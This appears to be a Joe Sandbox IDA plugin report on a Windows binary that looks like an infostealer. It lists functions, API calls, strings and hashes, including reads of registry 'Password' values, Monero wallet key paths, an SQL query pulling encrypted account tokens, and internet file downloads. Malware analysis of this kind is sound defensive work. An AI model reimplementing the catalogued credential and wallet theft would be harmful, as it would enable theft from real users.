Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: b4c9152a5d333e3b547542ad6acd85a6524af65eb4820189ea7926be18ce589d
Instruction ID: ee93841b3a5af88c7e6b930852681423e1db3e7358b89c73bdff24446f03f816
Opcode Fuzzy Hash: b4c9152a5d333e3b547542ad6acd85a6524af65eb4820189ea7926be18ce589d
Instruction Fuzzy Hash: 4C21DBB1E44258ABDB10DFD4CC49FAEB7B8FB45B50F108519F609BB280D77C69018BA5

Function 007672D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0076733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007673B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0076740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00767452
HeapFree.KERNEL32(00000000), ref: 00767459
task.LIBCPMTD ref: 00767555

Strings

Password, xrefs: 00767401

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 2404607ec1cbe0ea8cca1cf270bf08b7e3b5d05b43b51e765f7d33e322baefb5
Instruction ID: b75e9fc0c6da782254fcaea0b385a6258540fb3350a5b182f028aac3c78f5b98
Opcode Fuzzy Hash: 2404607ec1cbe0ea8cca1cf270bf08b7e3b5d05b43b51e765f7d33e322baefb5
Instruction Fuzzy Hash: DA616BB1804168DBDB24DB50CC55BDAB7B8BF44344F0081E9EA4AA6141DF785FC9CFA1

Function 0076BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

lstrlen.KERNEL32(00000000), ref: 0076BC9F

Part of subcall function 00778E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0076BCCD
lstrlen.KERNEL32(00000000), ref: 0076BDA5
lstrlen.KERNEL32(00000000), ref: 0076BDB9

Strings

AccountId, xrefs: 0076BCC4
AccountTokens, xrefs: 0076BB49
SELECT service, encrypted_token FROM token_service, xrefs: 0076BBEB
AccountTokens, xrefs: 0076BABA

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: b7b2ec5a891bf025a3a0f1eda27409f500cde5d73468f26464c79700cd172bba
Instruction ID: cca83fa03348e3bd4f9ebaa9ee3fd71266fab1eda06b8f10badc43bb34fc1d9b
Opcode Fuzzy Hash: b7b2ec5a891bf025a3a0f1eda27409f500cde5d73468f26464c79700cd172bba
Instruction Fuzzy Hash: 8BB11571910104EBEF05FBA0DD5ADEE737CAF94340F408168F51BA6091EF386A59CBA2

Function 00764FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00764FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00764FD1
InternetOpenA.WININET(00780DDF,00000000,00000000,00000000,00000000), ref: 00764FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00765011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00765041
InternetCloseHandle.WININET(?), ref: 007650B9
InternetCloseHandle.WININET(?), ref: 007650C6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 08edda8dd7660095ecbf8b28016b72102b02c8831cee71ddf78419b4ffb18183
Instruction ID: 4470cc5a48147b39865bcfdbc766e7cde5109c7376b12665775c3de16fd19b28
Opcode Fuzzy Hash: 08edda8dd7660095ecbf8b28016b72102b02c8831cee71ddf78419b4ffb18183
Instruction Fuzzy Hash: D33105B4A44218ABDB20CF54DC89BDDB7B4EB48704F1081D8EB09A7281D7746EC5DF99

Function 007783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00778426
wsprintfA.USER32 ref: 00778459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0077847B
RegCloseKey.ADVAPI32(00000000), ref: 0077848C
RegCloseKey.ADVAPI32(00000000), ref: 00778499

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

RegQueryValueExA.KERNEL32(00000000,0125E050,00000000,000F003F,?,00000400), ref: 007784EC
lstrlen.KERNEL32(?), ref: 00778501
RegQueryValueExA.KERNEL32(00000000,0125E128,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00780B34), ref: 00778599
RegCloseKey.KERNEL32(00000000), ref: 00778608
RegCloseKey.ADVAPI32(00000000), ref: 0077861A

Strings

%s\%s, xrefs: 0077844D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 456809c60b3fe28ad410020140ce8d9f1372b4b3dbd51833c168ca9cfab3603c
Instruction ID: cd14c69ce140ec5f56e27e4c3616e6b3f9adab21924398bb556dc2fb87145fba
Opcode Fuzzy Hash: 456809c60b3fe28ad410020140ce8d9f1372b4b3dbd51833c168ca9cfab3603c
Instruction Fuzzy Hash: C72127B1950218ABDB64DB54CC85FE9B3B8FF48700F00C198E609A6140DF756A85CFD5

Function 00777690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007776A4
RtlAllocateHeap.NTDLL(00000000), ref: 007776AB
RegOpenKeyExA.KERNEL32(80000002,0124C2E0,00000000,00020119,00000000), ref: 007776DD
RegQueryValueExA.KERNEL32(00000000,0125E140,00000000,00000000,?,000000FF), ref: 007776FE
RegCloseKey.ADVAPI32(00000000), ref: 00777708

Strings

Windows 11, xrefs: 007776BD

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 06b2f507afb88bee44b5f5127e1cb9b36f3c64da7462b27a41e1ec4ff9a41a9f
Instruction ID: 74021e302f86d296bcf6217f9c3370d03f7b60330922c782f5387b0698950b7e
Opcode Fuzzy Hash: 06b2f507afb88bee44b5f5127e1cb9b36f3c64da7462b27a41e1ec4ff9a41a9f
Instruction Fuzzy Hash: 6F014FB5A58204BBDB04DBE4DC49F6AB7B8EF49701F108454FA09D7290D7789904DBD1

Function 00777720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777734
RtlAllocateHeap.NTDLL(00000000), ref: 0077773B
RegOpenKeyExA.KERNEL32(80000002,0124C2E0,00000000,00020119,007776B9), ref: 0077775B
RegQueryValueExA.KERNEL32(007776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0077777A
RegCloseKey.ADVAPI32(007776B9), ref: 00777784

Strings

CurrentBuildNumber, xrefs: 00777771

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 4d828fe41338284ec0ffd78e07685a9eafd69a810e6ce092384faaaedcc23cb3
Instruction ID: 9fabcf2376e0a664ed64d641f8f77bd2ca86cc78bdf2f677f9d579fa9aa43e1c
Opcode Fuzzy Hash: 4d828fe41338284ec0ffd78e07685a9eafd69a810e6ce092384faaaedcc23cb3
Instruction Fuzzy Hash: 690121B5A54208BBDB40DBE4DC49FAEB7B8EF44701F004154FA05A6281DB745500DB92

Function 007769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250EA0), ref: 007798A1
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250C48), ref: 007798BA
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250CD8), ref: 007798D2
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250E58), ref: 007798EA
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250DE0), ref: 00779903
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,012591C8), ref: 0077991B
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01244E60), ref: 00779933
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01244F60), ref: 0077994C
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250EB8), ref: 00779964
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250CF0), ref: 0077997C
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250BD0), ref: 00779995
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250D08), ref: 007799AD
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01244EA0), ref: 007799C5
Part of subcall function 00779860: GetProcAddress.KERNEL32(75550000,01250D38), ref: 007799DE

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 007611D0: ExitProcess.KERNEL32 ref: 00761211

Part of subcall function 00761160: GetSystemInfo.KERNEL32(?), ref: 0076116A
